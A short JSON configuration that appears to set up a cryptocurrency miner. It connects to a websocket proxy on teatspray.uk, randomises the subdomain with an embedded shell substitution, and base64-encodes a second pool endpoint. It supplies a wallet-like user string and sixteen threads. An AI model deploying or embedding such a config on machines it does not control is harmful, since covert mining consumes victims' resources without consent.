{
  "host": "ws://cpusocks$(shuf -i 1-6 -n 1).teatspray.uk:9999/Zmx5aW5nc2F1Y2VyLWV1LnRlYXRzcHJheS51azo2MjQy",
  "port": 3306,
  "user": "MiKbRHckresTQLQQiXcBVeKkE1ScK9Wa93",
  "pass": "c=MBC,zap=MBC",
  "threads": 16
}
